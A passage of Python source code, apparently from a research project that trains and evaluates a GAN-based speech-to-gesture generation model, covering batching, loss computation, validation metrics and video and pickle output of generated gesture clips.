audio = torch.from_numpy(audio).float()
spectrogram = torch.from_numpy(spectrogram)
batch_word_seq_tensor[i, :len(word_seq_tensor)] = word_seq_tensor
batch_word_seq_lengths[i] = len(word_seq_tensor)
batch_extended_word_seq[i] = extended_word_seq
batch_pose_seq[i] = pose_seq
batch_vec_seq[i] = vec_seq
batch_target_seq[i] = torch.from_numpy(target_seq).float()
batch_audio[i] = audio
batch_spectrogram[i] = spectrogram
batch_mfcc[i] = mfcc_features
# speaker input
# if self.test_speaker_model and self.test_speaker_model.__class__.__name__ == 'Vocab':
# batch_vid_indices[i] = \
# torch.LongTensor([self.test_speaker_model.word2index[aux_info['vid']]])
batch_vid_indices = torch.LongTensor(
[np.random.choice(list(self.test_speaker_model.word2index.values()))
for _ in range(batch_size)]).to(self.device)
return batch_words, batch_aux_info, batch_word_seq_tensor, batch_word_seq_lengths, \
batch_extended_word_seq, batch_pose_seq, batch_vec_seq, batch_target_seq, batch_audio, \
batch_spectrogram, batch_mfcc, batch_vid_indices
@staticmethod
def add_noise(data):
noise = torch.randn_like(data) * 0.1
return data + noise
@staticmethod
def push_samples(evaluator, target, out_dir_vec, in_text_padded, in_audio,
losses_all, joint_mae, accel, mean_dir_vec, n_poses, n_pre_poses):
batch_size = len(target)
# if evaluator:
# evaluator.reset()
loss = F.l1_loss(out_dir_vec, target)
losses_all.update(loss.item(), batch_size)
if evaluator:
evaluator.push_samples(in_text_padded, in_audio, out_dir_vec, target)
# calculate MAE of joint coordinates
out_dir_vec_np = out_dir_vec.detach().cpu().numpy()
out_dir_vec_np += np.array(mean_dir_vec).squeeze()
out_joint_poses = convert_dir_vec_to_pose(out_dir_vec_np)
target_vec = target.detach().cpu().numpy()
target_vec += np.array(mean_dir_vec).squeeze()
target_poses = convert_dir_vec_to_pose(target_vec)
if out_joint_poses.shape[1] == n_poses:
diff = out_joint_poses[:, n_pre_poses:] - \
target_poses[:, n_pre_poses:]
else:
diff = out_joint_poses - target_poses[:, n_pre_poses:]
mae_val = np.mean(np.absolute(diff))
joint_mae.update(mae_val, batch_size)
# accel
target_acc = np.diff(target_poses, n=2, axis=1)
out_acc = np.diff(out_joint_poses, n=2, axis=1)
accel.update(np.mean(np.abs(target_acc - out_acc)), batch_size)
return evaluator, losses_all, joint_mae, accel
def forward_pass_s2ag(self, in_text, in_audio, in_mfcc, target_poses, vid_indices, train,
target_seq=None, words=None, aux_info=None, save_path=None, make_video=False,
calculate_metrics=False, losses_all_trimodal=None, joint_mae_trimodal=None,
accel_trimodal=None, losses_all=None, joint_mae=None, accel=None):
warm_up_epochs = self.s2ag_config_args.loss_warmup
use_noisy_target = False
# make pre seq input
pre_seq = target_poses.new_zeros((target_poses.shape[0], target_poses.shape[1],
target_poses.shape[2] + 1))
pre_seq[:, 0:self.s2ag_config_args.n_pre_poses, :-1] =\
target_poses[:, 0:self.s2ag_config_args.n_pre_poses]
pre_seq[:, 0:self.s2ag_config_args.n_pre_poses, -1] = 1 # indicating bit for constraints
###########################################################################################
# train D
dis_error = None
if self.meta_info['epoch'] > warm_up_epochs and self.s2ag_config_args.loss_gan_weight > 0.0:
self.s2ag_dis_optimizer.zero_grad()
# out shape (batch x seq x dim)
if self.use_mfcc:
out_dir_vec, *_ = self.s2ag_generator(pre_seq, in_text, in_mfcc, vid_indices)
else:
out_dir_vec, *_ = self.s2ag_generator(pre_seq, in_text, in_audio, vid_indices)
if use_noisy_target:
noise_target = Processor.add_noise(target_poses)
noise_out = Processor.add_noise(out_dir_vec.detach())
dis_real = self.s2ag_discriminator(noise_target, in_text)
dis_fake = self.s2ag_discriminator(noise_out, in_text)
else:
dis_real = self.s2ag_discriminator(target_poses, in_text)
dis_fake = self.s2ag_discriminator(out_dir_vec.detach(), in_text)
dis_error = torch.sum(-torch.mean(torch.log(dis_real + 1e-8) + torch.log(1 - dis_fake + 1e-8))) # ns-gan
if train:
dis_error.backward()
self.s2ag_dis_optimizer.step()
###########################################################################################
# train G
self.s2ag_gen_optimizer.zero_grad()
# decoding
out_dir_vec_trimodal, *_ = self.trimodal_generator(pre_seq, in_text, in_audio, vid_indices)
if self.use_mfcc:
out_dir_vec, z, z_mu, z_log_var = self.s2ag_generator(pre_seq, in_text, in_mfcc, vid_indices)
else:
out_dir_vec, z, z_mu, z_log_var = self.s2ag_generator(pre_seq, in_text, in_audio, vid_indices)
# make a video
assert not make_video or (make_video and target_seq is not None), \
'target_seq cannot be None when make_video is True'
assert not make_video or (make_video and words is not None), \
'words cannot be None when make_video is True'
assert not make_video or (make_video and aux_info is not None), \
'aux_info cannot be None when make_video is True'
assert not make_video or (make_video and save_path is not None), \
'save_path cannot be None when make_video is True'
if make_video:
sentence_words = []
for word in words:
sentence_words.append(word)
sentences = [' '.join(sentence_word) for sentence_word in sentence_words]
num_videos = len(aux_info)
for vid_idx in range(num_videos):
start_time = time.time()
filename_prefix = '{}_{}'.format(aux_info[vid_idx]['vid'], vid_idx)
filename_prefix_for_video = filename_prefix
aux_str = '({}, time: {}-{})'.format(aux_info[vid_idx]['vid'],
str(datetime.timedelta(
seconds=aux_info[vid_idx]['start_time'])),
str(datetime.timedelta(
seconds=aux_info[vid_idx]['end_time'])))
create_video_and_save(
save_path, 0, filename_prefix_for_video, 0,
target_seq[vid_idx].cpu().numpy(),
out_dir_vec_trimodal[vid_idx].cpu().numpy(), out_dir_vec[vid_idx].cpu().numpy(),
np.reshape(self.s2ag_config_args.mean_dir_vec, -1), sentences[vid_idx],
audio=in_audio[vid_idx].cpu().numpy(), aux_str=aux_str,
clipping_to_shortest_stream=True, delete_audio_file=False)
print('\rRendered {} of {} videos. Last one took {:.2f} seconds.'.format(vid_idx + 1,
num_videos,
time.time() - start_time),
end='')
print()
# calculate metrics
assert not calculate_metrics or (calculate_metrics and target_seq is not None), \
'target_seq cannot be None when calculate_metrics is True'
assert not calculate_metrics or (calculate_metrics and losses_all_trimodal is not None), \
'losses_all_trimodal cannot be None when calculate_metrics is True'
assert not calculate_metrics or (calculate_metrics and joint_mae_trimodal is not None), \
'joint_mae_trimodal cannot be None when calculate_metrics is True'
assert not calculate_metrics or (calculate_metrics and accel_trimodal is not None), \
'accel_trimodal cannot be None when calculate_metrics is True'
assert not calculate_metrics or (calculate_metrics and losses_all is not None), \
'losses_all cannot be None when calculate_metrics is True'
assert not calculate_metrics or (calculate_metrics and joint_mae is not None), \
'joint_mae cannot be None when calculate_metrics is True'
assert not calculate_metrics or (calculate_metrics and accel is not None), \
'accel cannot be None when calculate_metrics is True'
if calculate_metrics:
self.evaluator_trimodal, losses_all_trimodal, joint_mae_trimodal, accel_trimodal =\
Processor.push_samples(self.evaluator_trimodal, target_seq, out_dir_vec_trimodal,
in_text, in_audio, losses_all_trimodal, joint_mae_trimodal, accel_trimodal,
self.s2ag_config_args.mean_dir_vec, self.s2ag_config_args.n_poses,
self.s2ag_config_args.n_pre_poses)
self.evaluator, losses_all, joint_mae, accel =\
Processor.push_samples(self.evaluator, target_seq, out_dir_vec,
in_text, in_audio, losses_all, joint_mae, accel,
self.s2ag_config_args.mean_dir_vec, self.s2ag_config_args.n_poses,
self.s2ag_config_args.n_pre_poses)
# loss
beta = 0.1
huber_loss = F.smooth_l1_loss(out_dir_vec / beta, target_poses / beta) * beta
dis_output = self.s2ag_discriminator(out_dir_vec, in_text)
gen_error = -torch.mean(torch.log(dis_output + 1e-8))
kld = div_reg = None
if (self.s2ag_config_args.z_type == 'speaker' or self.s2ag_config_args.z_type == 'random') and \
self.s2ag_config_args.loss_reg_weight > 0.0:
if self.s2ag_config_args.z_type == 'speaker':
# enforcing divergent gestures btw original vid and other vid
rand_idx = torch.randperm(vid_indices.shape[0])
rand_vids = vid_indices[rand_idx]
else:
rand_vids = None
if self.use_mfcc:
out_dir_vec_rand_vid, z_rand_vid, _, _ = self.s2ag_generator(pre_seq, in_text, in_mfcc, rand_vids)
else:
out_dir_vec_rand_vid, z_rand_vid, _, _ = self.s2ag_generator(pre_seq, in_text, in_audio, rand_vids)
beta = 0.05
pose_l1 = F.smooth_l1_loss(out_dir_vec / beta, out_dir_vec_rand_vid.detach() / beta,
reduction='none') * beta
pose_l1 = pose_l1.sum(dim=1).sum(dim=1)
pose_l1 = pose_l1.view(pose_l1.shape[0], -1).mean(1)
z_l1 = F.l1_loss(z.detach(), z_rand_vid.detach(), reduction='none')
z_l1 = z_l1.view(z_l1.shape[0], -1).mean(1)
div_reg = -(pose_l1 / (z_l1 + 1.0e-5))
div_reg = torch.clamp(div_reg, min=-1000)
div_reg = div_reg.mean()
if self.s2ag_config_args.z_type == 'speaker':
# speaker embedding KLD
kld = -0.5 * torch.mean(1 + z_log_var - z_mu.pow(2) - z_log_var.exp())
loss = self.s2ag_config_args.loss_regression_weight * huber_loss + \
self.s2ag_config_args.loss_kld_weight * kld + \
self.s2ag_config_args.loss_reg_weight * div_reg
else:
loss = self.s2ag_config_args.loss_regression_weight * huber_loss + \
self.s2ag_config_args.loss_reg_weight * div_reg
else:
loss = self.s2ag_config_args.loss_regression_weight * huber_loss # + var_loss
if self.meta_info['epoch'] > warm_up_epochs:
loss += self.s2ag_config_args.loss_gan_weight * gen_error
if train:
loss.backward()
self.s2ag_gen_optimizer.step()
loss_dict = {'loss': self.s2ag_config_args.loss_regression_weight * huber_loss.item()}
if kld:
loss_dict['KLD'] = self.s2ag_config_args.loss_kld_weight * kld.item()
if div_reg:
loss_dict['DIV_REG'] = self.s2ag_config_args.loss_reg_weight * div_reg.item()
if self.meta_info['epoch'] > warm_up_epochs and self.s2ag_config_args.loss_gan_weight > 0.0:
loss_dict['gen'] = self.s2ag_config_args.loss_gan_weight * gen_error.item()
loss_dict['dis'] = dis_error.item()
# total_loss = 0.
# for loss in loss_dict.keys():
# total_loss += loss_dict[loss]
# return loss_dict, losses_all_trimodal, joint_mae_trimodal, accel_trimodal, losses_all, joint_mae, accel
return F.l1_loss(out_dir_vec, target_poses).item() - F.l1_loss(out_dir_vec_trimodal, target_poses).item(),\
losses_all_trimodal, joint_mae_trimodal, accel_trimodal, losses_all, joint_mae, accel
def per_train_epoch(self):
self.s2ag_generator.train()
self.s2ag_discriminator.train()
batch_s2ag_loss = 0.
num_batches = self.num_train_samples // self.args.batch_size + 1
start_time = time.time()
self.meta_info['iter'] = 0
for extended_word_seq, vec_seq, audio,\
mfcc_features, vid_indices in self.yield_batch(train=True):
loss, *_ = self.forward_pass_s2ag(extended_word_seq, audio, mfcc_features,
vec_seq, vid_indices, train=True)
# Compute statistics
batch_s2ag_loss += loss
self.iter_info['s2ag_loss'] = loss
self.iter_info['lr_gen'] = '{}'.format(self.lr_s2ag_gen)
self.iter_info['lr_dis'] = '{}'.format(self.lr_s2ag_dis)
self.show_iter_info()
self.meta_info['iter'] += 1
print('\riter {:>3}/{} took {:>4} seconds\t'.
format(self.meta_info['iter'], num_batches, int(np.ceil(time.time() - start_time))), end='')
batch_s2ag_loss /= num_batches
self.epoch_info['mean_s2ag_loss'] = batch_s2ag_loss
self.show_epoch_info()
self.io.print_timer()
# self.adjust_lr_s2ag()
def per_val_epoch(self):
self.s2ag_generator.eval()
self.s2ag_discriminator.eval()
batch_s2ag_loss = 0.
num_batches = self.num_val_samples // self.args.batch_size + 1
start_time = time.time()
self.meta_info['iter'] = 0
for extended_word_seq, vec_seq, audio,\
mfcc_features, vid_indices in self.yield_batch(train=False):
with torch.no_grad():
loss, *_ = self.forward_pass_s2ag(extended_word_seq, audio, mfcc_features,
vec_seq, vid_indices, train=False)
# Compute statistics
batch_s2ag_loss += loss
self.iter_info['s2ag_loss'] = loss
self.iter_info['lr_gen'] = '{:.6f}'.format(self.lr_s2ag_gen)
self.iter_info['lr_dis'] = '{:.6f}'.format(self.lr_s2ag_dis)
self.show_iter_info()
self.meta_info['iter'] += 1
print('\riter {:>3}/{} took {:>4} seconds\t'.
format(self.meta_info['iter'], num_batches, int(np.ceil(time.time() - start_time))), end='')
batch_s2ag_loss /= num_batches
self.epoch_info['mean_s2ag_loss'] = batch_s2ag_loss
if self.epoch_info['mean_s2ag_loss'] < self.best_s2ag_loss and \
self.meta_info['epoch'] > self.min_train_epochs:
self.best_s2ag_loss = self.epoch_info['mean_s2ag_loss']
self.best_s2ag_loss_epoch = self.meta_info['epoch']
self.s2ag_loss_updated = True
else:
self.s2ag_loss_updated = False
self.show_epoch_info()
self.io.print_timer()
def train(self):
trimodal_checkpoint = torch.load(jn(self.base_path, 'outputs', 'trimodal_gen.pth.tar'))
self.trimodal_generator.load_state_dict(trimodal_checkpoint['trimodal_gen_dict'])
if self.args.s2ag_load_last_best:
s2ag_model_found = self.load_model_at_epoch(epoch=self.args.s2ag_start_epoch)
if not s2ag_model_found and self.args.s2ag_start_epoch is not 'best':
print('Warning! Trying to load best known model for s2ag: '.format(self.args.s2ag_start_epoch),
end='')
s2ag_model_found = self.load_model_at_epoch(epoch='best')
self.args.s2ag_start_epoch = self.best_s2ag_loss_epoch if s2ag_model_found else 0
print('loaded.')
if not s2ag_model_found:
print('Warning! Starting at epoch 0')
self.args.s2ag_start_epoch = 0
else:
self.args.s2ag_start_epoch = 0
for epoch in range(self.args.s2ag_start_epoch, self.args.s2ag_num_epoch):
self.meta_info['epoch'] = epoch
# training
self.io.print_log('s2ag training epoch: {}'.format(epoch))
self.per_train_epoch()
self.io.print_log('Done.')
# validation
if (epoch % self.args.val_interval == 0) or (
epoch + 1 == self.args.num_epoch):
self.io.print_log('s2ag val epoch: {}'.format(epoch))
self.per_val_epoch()
self.io.print_log('Done.')
# save model and weights
if self.s2ag_loss_updated or (epoch % self.args.save_interval == 0 and epoch > self.min_train_epochs):
torch.save({'gen_model_dict': self.s2ag_generator.state_dict(),
'dis_model_dict': self.s2ag_discriminator.state_dict()},
jn(self.args.work_dir_s2ag, 'epoch_{:06d}_loss_{:.4f}_model.pth.tar'.
format(epoch, self.epoch_info['mean_s2ag_loss'])))
def generate_gestures(self, samples_to_generate=10, randomized=True, load_saved_model=True,
s2ag_epoch='best', make_video=False, calculate_metrics=True):
if load_saved_model:
s2ag_model_found = self.load_model_at_epoch(epoch=s2ag_epoch)
assert s2ag_model_found, print('Speech to emotive gestures model not found')
trimodal_checkpoint = torch.load(jn(self.base_path, 'outputs', 'trimodal_gen.pth.tar'))
self.trimodal_generator.load_state_dict(trimodal_checkpoint['trimodal_gen_dict'])
self.trimodal_generator.eval()
self.s2ag_generator.eval()
self.s2ag_discriminator.eval()
batch_size = 2048
losses_all_trimodal = AverageMeter('loss')
joint_mae_trimodal = AverageMeter('mae_on_joint')
accel_trimodal = AverageMeter('accel')
losses_all = AverageMeter('loss')
joint_mae = AverageMeter('mae_on_joint')
accel = AverageMeter('accel')
start_time = time.time()
for sample_idx in np.arange(0, samples_to_generate, batch_size):
samples_curr = np.arange(sample_idx, sample_idx + min(batch_size, samples_to_generate - sample_idx))
words, aux_info, word_seq_tensor, word_seq_lengths, extended_word_seq, \
pose_seq, vec_seq, target_seq, audio, spectrogram, mfcc_features, vid_indices = \
self.return_batch(samples_curr, randomized=randomized)
with torch.no_grad():
loss_dict, losses_all_trimodal, joint_mae_trimodal,\
accel_trimodal, losses_all, joint_mae, accel = \
self.forward_pass_s2ag(extended_word_seq, audio, mfcc_features,
vec_seq, vid_indices, train=False,
target_seq=target_seq, words=words, aux_info=aux_info,
save_path=self.args.video_save_path,
make_video=make_video, calculate_metrics=calculate_metrics,
losses_all_trimodal=losses_all_trimodal,
joint_mae_trimodal=joint_mae_trimodal, accel_trimodal=accel_trimodal,
losses_all=losses_all, joint_mae=joint_mae, accel=accel)
end_idx = min(samples_to_generate, sample_idx + batch_size)
# print metrics
loss_dict = {'loss_trimodal': losses_all_trimodal.avg, 'joint_mae_trimodal': joint_mae_trimodal.avg,
'loss': losses_all.avg, 'joint_mae': joint_mae.avg}
elapsed_time = time.time() - start_time
if self.evaluator_trimodal and self.evaluator_trimodal.get_no_of_samples() > 0:
frechet_dist_trimodal, feat_dist_trimodal = self.evaluator_trimodal.get_scores()
print('[VAL Trimodal]\tloss: {:.3f}, joint mae: {:.5f}, accel diff: {:.5f},'
'FGD: {:.3f}, feat_D: {:.3f} / {:.1f}s'.format(losses_all_trimodal.avg,
joint_mae_trimodal.avg, accel_trimodal.avg,
frechet_dist_trimodal, feat_dist_trimodal,
elapsed_time))
loss_dict['frechet_trimodal'] = frechet_dist_trimodal
loss_dict['feat_dist_trimodal'] = feat_dist_trimodal
else:
print('[VAL Trimodal]\tloss: {:.3f}, joint mae: {:.3f} / {:.1f}s'.format(losses_all_trimodal.avg,
joint_mae_trimodal.avg,
elapsed_time))
if self.evaluator and self.evaluator.get_no_of_samples() > 0:
frechet_dist, feat_dist = self.evaluator.get_scores()
print('[VAL Ours]\t\tloss: {:.3f}, joint mae: {:.5f}, accel diff: {:.5f},'
'FGD: {:.3f}, feat_D: {:.3f} / {:.1f}s'.format(losses_all.avg, joint_mae.avg, accel.avg,
frechet_dist, feat_dist, elapsed_time))
loss_dict['frechet'] = frechet_dist
loss_dict['feat_dist'] = feat_dist
else:
print('[VAL Ours]\t\tloss: {:.3f}, joint mae: {:.3f} / {:.1f}s'.format(losses_all.avg,
joint_mae.avg,
elapsed_time))
end_time = time.time()
print('Total time taken: {:.2f} seconds.'.format(end_time - start_time))
def render_clip(self, data_params, vid_name, sample_idx, samples_to_generate,
clip_poses, clip_audio, sample_rate, clip_words, clip_time,
test_samples=None, clip_idx=0, unit_time=None, speaker_vid_idx=0, check_duration=True,
fade_out=False, make_video=False, save_pkl=False):
if '{}_{:.2f}_{:.2f}'.format(vid_name, clip_time[0], clip_time[1]) not in test_samples:
return [], [], [], []
start_time = time.time()
mean_dir_vec = np.squeeze(np.array(self.s2ag_config_args.mean_dir_vec))
clip_poses_resampled = resample_pose_seq(clip_poses, clip_time[1] - clip_time[0],
self.s2ag_config_args.motion_resampling_framerate)
target_dir_vec = convert_pose_seq_to_dir_vec(clip_poses_resampled)
target_dir_vec = target_dir_vec.reshape(target_dir_vec.shape[0], -1)
target_dir_vec -= mean_dir_vec
n_frames_total = len(target_dir_vec)
# check duration
if check_duration:
clip_duration = clip_time[1] - clip_time[0]
if clip_duration < data_params['clip_duration_range'][0] or \
clip_duration > data_params['clip_duration_range'][1]:
return None, None, None
# synthesize
for selected_vi in range(len(clip_words)): # make start time of input text zero
clip_words[selected_vi][1] -= clip_time[0] # start time
clip_words[selected_vi][2] -= clip_time[0] # end time
out_list_trimodal = []
out_list = []
n_frames = self.s2ag_config_args.n_poses
clip_length = len(clip_audio) / sample_rate
seed_seq = target_dir_vec[0:self.s2ag_config_args.n_pre_poses]
# pre seq
pre_seq_trimodal = torch.zeros((1, n_frames, self.pose_dim + 1))
if seed_seq is not None:
pre_seq_trimodal[0, 0:self.s2ag_config_args.n_pre_poses, :-1] = \
torch.Tensor(seed_seq[0:self.s2ag_config_args.n_pre_poses])
# indicating bit for seed poses
pre_seq_trimodal[0, 0:self.s2ag_config_args.n_pre_poses, -1] = 1
pre_seq = torch.zeros((1, n_frames, self.pose_dim + 1))
if seed_seq is not None:
pre_seq[0, 0:self.s2ag_config_args.n_pre_poses, :-1] = \
torch.Tensor(seed_seq[0:self.s2ag_config_args.n_pre_poses])
# indicating bit for seed poses
pre_seq[0, 0:self.s2ag_config_args.n_pre_poses, -1] = 1
# target seq
target_seq = torch.from_numpy(target_dir_vec[0:n_frames]).unsqueeze(0).float().to(self.device)
spectrogram = None
# divide into synthesize units and do synthesize
if unit_time is None:
unit_time = self.s2ag_config_args.n_poses / \
self.s2ag_config_args.motion_resampling_framerate
stride_time = (self.s2ag_config_args.n_poses - self.s2ag_config_args.n_pre_poses) / \
self.s2ag_config_args.motion_resampling_framerate
if clip_length < unit_time:
num_subdivisions = 1
else:
num_subdivisions = math.ceil((clip_length - unit_time) / stride_time) + 1
spectrogram_sample_length = int(round(unit_time * sample_rate / 512))
audio_sample_length = int(unit_time * sample_rate)
end_padding_duration = 0
# prepare speaker input
if self.s2ag_config_args.z_type == 'speaker':
if speaker_vid_idx is None:
speaker_vid_idx = np.random.randint(0, self.s2ag_generator.z_obj.n_words)
print('vid idx:', speaker_vid_idx)
speaker_vid_idx = torch.LongTensor([speaker_vid_idx]).to(self.device)
else:
speaker_vid_idx = None
print('Sample {} of {}'.format(sample_idx + 1, samples_to_generate))
print('Subdivisions\t|\tUnit Time\t|\tClip Length\t|\tStride Time\t|\tAudio Sample Length')
print('{:>12d}\t|\t{:>9.4f}\t|\t{:>11.4f}\t|\t{:>11.4f}\t|\t{:>19d}'.
format(num_subdivisions, unit_time, clip_length,
stride_time, audio_sample_length))
out_dir_vec_trimodal = None
out_dir_vec = None
for sub_div_idx in range(0, num_subdivisions):
sub_div_start_time = min(sub_div_idx * stride_time, clip_length)
sub_div_end_time = min(sub_div_start_time + unit_time, clip_length)
if sub_div_start_time >= sub_div_end_time:
continue
# prepare spectrogram input
in_spec = None
# prepare audio input
audio_start = math.floor(sub_div_start_time / clip_length * len(clip_audio))
audio_end = audio_start + audio_sample_length
in_audio_np = clip_audio[audio_start:audio_end]
if len(in_audio_np) < audio_sample_length:
if sub_div_idx == num_subdivisions - 1:
end_padding_duration = audio_sample_length - len(in_audio_np)
in_audio_np = np.pad(in_audio_np, (0, audio_sample_length - len(in_audio_np)),
'constant')
in_mfcc = torch.from_numpy(
cmn.get_mfcc_features(in_audio_np, sr=sample_rate,
num_mfcc=self.data_loader['train_data_s2ag'].num_mfcc if self.args.train_s2ag else
self.data_loader['test_data_s2ag'].num_mfcc)).unsqueeze(0).to(self.device).float()
in_audio = torch.from_numpy(in_audio_np).unsqueeze(0).to(self.device).float()
# prepare text input
word_seq = DataPreprocessor.get_words_in_time_range(word_list=clip_words,
start_time=sub_div_start_time,
end_time=sub_div_end_time)
extended_word_indices = np.zeros(n_frames) # zero is the index of padding token
word_indices = np.zeros(len(word_seq) + 2)
word_indices[0] = self.lang_model.SOS_token
word_indices[-1] = self.lang_model.EOS_token
frame_duration = (sub_div_end_time - sub_div_start_time) / n_frames
print('Subdivision {} of {}. Words: '.format(sub_div_idx + 1, num_subdivisions), end='')
for w_i, word in enumerate(word_seq):
print(word[0], end=', ')
idx = max(0, int(np.floor((word[1] - sub_div_start_time) / frame_duration)))
extended_word_indices[idx] = self.lang_model.get_word_index(word[0])
word_indices[w_i + 1] = self.lang_model.get_word_index(word[0])
print('\b\b', end='.\n')
in_text_padded = torch.LongTensor(extended_word_indices).unsqueeze(0).to(self.device)
# prepare target seq and pre seq
if sub_div_idx > 0:
target_seq = torch.zeros_like(out_dir_vec)
start_idx = min(n_frames_total, n_frames * (sub_div_idx - 1))
end_idx = min(n_frames_total, n_frames * sub_div_idx)
target_seq[0, :(end_idx - start_idx)] = torch.from_numpy(
target_dir_vec[start_idx:end_idx]) \
.unsqueeze(0).float().to(self.device)
pre_seq_trimodal[0, 0:self.s2ag_config_args.n_pre_poses, :-1] = \
out_dir_vec_trimodal.squeeze(0)[-self.s2ag_config_args.n_pre_poses:]
# indicating bit for constraints
pre_seq_trimodal[0, 0:self.s2ag_config_args.n_pre_poses, -1] = 1
pre_seq[0, 0:self.s2ag_config_args.n_pre_poses, :-1] = \
out_dir_vec.squeeze(0)[-self.s2ag_config_args.n_pre_poses:]
# indicating bit for constraints
pre_seq[0, 0:self.s2ag_config_args.n_pre_poses, -1] = 1
pre_seq_trimodal = pre_seq_trimodal.float().to(self.device)
pre_seq = pre_seq.float().to(self.device)
out_dir_vec_trimodal, *_ = self.trimodal_generator(pre_seq_trimodal,
in_text_padded, in_audio, speaker_vid_idx)
out_dir_vec, *_ = self.s2ag_generator(pre_seq, in_text_padded, in_mfcc, speaker_vid_idx)
out_seq_trimodal = out_dir_vec_trimodal[0, :, :].data.cpu().numpy()
out_seq = out_dir_vec[0, :, :].data.cpu().numpy()
# smoothing motion transition
if len(out_list_trimodal) > 0:
last_poses = out_list_trimodal[-1][-self.s2ag_config_args.n_pre_poses:]
# delete last 4 frames
out_list_trimodal[-1] = out_list_trimodal[-1][:-self.s2ag_config_args.n_pre_poses]
n = len(last_poses)
for j in range(n):
prev_pose = last_poses[j]
next_pose = out_seq_trimodal[j]
out_seq_trimodal[j] = prev_pose * (n - j) / (n + 1) + next_pose * (j + 1) / (n + 1)
out_list_trimodal.append(out_seq_trimodal)
if len(out_list) > 0:
last_poses = out_list[-1][-self.s2ag_config_args.n_pre_poses:]
# delete last 4 frames
out_list[-1] = out_list[-1][:-self.s2ag_config_args.n_pre_poses]
n = len(last_poses)
for j in range(n):
prev_pose = last_poses[j]
next_pose = out_seq[j]
out_seq[j] = prev_pose * (n - j) / (n + 1) + next_pose * (j + 1) / (n + 1)
out_list.append(out_seq)
# aggregate results
out_dir_vec_trimodal = np.vstack(out_list_trimodal)
out_dir_vec = np.vstack(out_list)
# fade out to the mean pose
if fade_out:
n_smooth = self.s2ag_config_args.n_pre_poses
start_frame = len(out_dir_vec_trimodal) - \
int(end_padding_duration / data_params['audio_sr']
* self.s2ag_config_args.motion_resampling_framerate)
end_frame = start_frame + n_smooth * 2
if len(out_dir_vec_trimodal) < end_frame:
out_dir_vec_trimodal = np.pad(out_dir_vec_trimodal,
[(0, end_frame - len(out_dir_vec_trimodal)), (0, 0)],
mode='constant')
out_dir_vec_trimodal[end_frame - n_smooth:] = \
np.zeros(self.pose_dim) # fade out to mean poses
n_smooth = self.s2ag_config_args.n_pre_poses
start_frame = len(out_dir_vec) - \
int(end_padding_duration /
data_params['audio_sr'] * self.s2ag_config_args.motion_resampling_framerate)
end_frame = start_frame + n_smooth * 2
if len(out_dir_vec) < end_frame:
out_dir_vec = np.pad(out_dir_vec, [(0, end_frame - len(out_dir_vec)), (0, 0)],
mode='constant')
out_dir_vec[end_frame - n_smooth:] = \
np.zeros(self.pose_dim) # fade out to mean poses
# interpolation
y_target = target_dir_vec[start_frame:end_frame]
y_trimodal = out_dir_vec_trimodal[start_frame:end_frame]
y = out_dir_vec[start_frame:end_frame]
x = np.array(range(0, y.shape[0]))
w = np.ones(len(y))
w[0] = 5
w[-1] = 5
co_effs_target = np.polyfit(x, y_target, 2, w=w)
fit_functions_target = [np.poly1d(co_effs_target[:, k])
for k in range(0, y_target.shape[1])]
interpolated_y_target = [fit_functions_target[k](x)
for k in range(0, y_target.shape[1])]
# (num_frames x dims)
interpolated_y_target = np.transpose(np.asarray(interpolated_y_target))
co_effs_trimodal = np.polyfit(x, y_trimodal, 2, w=w)
fit_functions_trimodal = [np.poly1d(co_effs_trimodal[:, k])
for k in range(0, y_trimodal.shape[1])]
interpolated_y_trimodal = [fit_functions_trimodal[k](x)
for k in range(0, y_trimodal.shape[1])]
# (num_frames x dims)
interpolated_y_trimodal = np.transpose(np.asarray(interpolated_y_trimodal))
co_effs = np.polyfit(x, y, 2, w=w)
fit_functions = [np.poly1d(co_effs[:, k]) for k in range(0, y.shape[1])]
interpolated_y = [fit_functions[k](x) for k in range(0, y.shape[1])]
# (num_frames x dims)
interpolated_y = np.transpose(np.asarray(interpolated_y))
target_dir_vec[start_frame:end_frame] = interpolated_y_target
out_dir_vec_trimodal[start_frame:end_frame] = interpolated_y_trimodal
out_dir_vec[start_frame:end_frame] = interpolated_y
filename_prefix = '{}_s{}_{:.2f}_{:.2f}'.format(vid_name, speaker_vid_idx.item(), clip_time[0], clip_time[1])
sentence_words = []
for word, _, _ in clip_words:
sentence_words.append(word)
sentence = ' '.join(sentence_words)
# make a video
if make_video:
aux_str = '({}, time: {}-{})'.format(vid_name,
str(datetime.timedelta(seconds=clip_time[0])),
str(datetime.timedelta(seconds=clip_time[1])))
create_video_and_save(
self.args.video_save_path, self.best_s2ag_loss_epoch, filename_prefix, 0, target_dir_vec,
out_dir_vec_trimodal, out_dir_vec, mean_dir_vec, sentence,
audio=clip_audio, aux_str=aux_str, clipping_to_shortest_stream=True,
delete_audio_file=False)
print('Rendered {} of {} videos. Last one took {:.2f} seconds.'.
format(sample_idx + 1, samples_to_generate, time.time() - start_time))
out_dir_vec_trimodal = out_dir_vec_trimodal + mean_dir_vec
out_poses_trimodal = convert_dir_vec_to_pose(out_dir_vec_trimodal)
out_dir_vec = out_dir_vec + mean_dir_vec
out_poses = convert_dir_vec_to_pose(out_dir_vec)
# save pkl
if save_pkl:
save_dict = {
'sentence': sentence, 'audio': clip_audio.astype(np.float32),
'out_dir_vec': out_dir_vec_trimodal, 'out_poses': out_poses_trimodal,
'aux_info': '{}_{}_{}'.format(vid_name, speaker_vid_idx, clip_idx),
'human_dir_vec': target_dir_vec + mean_dir_vec,
}
with open(jn(self.args.video_save_path,
'{}_trimodal.pkl'.format(filename_prefix)), 'wb') as f:
pickle.dump(save_dict, f)
save_dict = {
'sentence': sentence, 'audio': clip_audio.astype(np.float32),
'out_dir_vec': out_dir_vec, 'out_poses': out_poses,
'aux_info': '{}_{}_{}'.format(vid_name, speaker_vid_idx, clip_idx),
'human_dir_vec': target_dir_vec + mean_dir_vec,
}
with open(jn(self.args.video_save_path,
'{}_s2ag.pkl'.format(filename_prefix)), 'wb') as f:
pickle.dump(save_dict, f)
return clip_poses_resampled, out_poses_trimodal, out_poses
def generate_gestures_by_dataset(self, dataset, data_params, check_duration=True,
samples=None, randomized=True, fade_out=False,
load_saved_model=True, s2ag_epoch='best',
make_video=False, save_pkl=False):
if load_saved_model:
s2ag_model_found = self.load_model_at_epoch(epoch=s2ag_epoch)
assert s2ag_model_found, print('Speech to emotive gestures model not found')
trimodal_checkpoint = torch.load(jn(self.base_path, 'outputs', 'trimodal_gen.pth.tar'))
self.trimodal_generator.load_state_dict(trimodal_checkpoint['trimodal_gen_dict'])
self.trimodal_generator.eval()
self.s2ag_generator.eval()
self.s2ag_discriminator.eval()
overall_start_time = time.time()
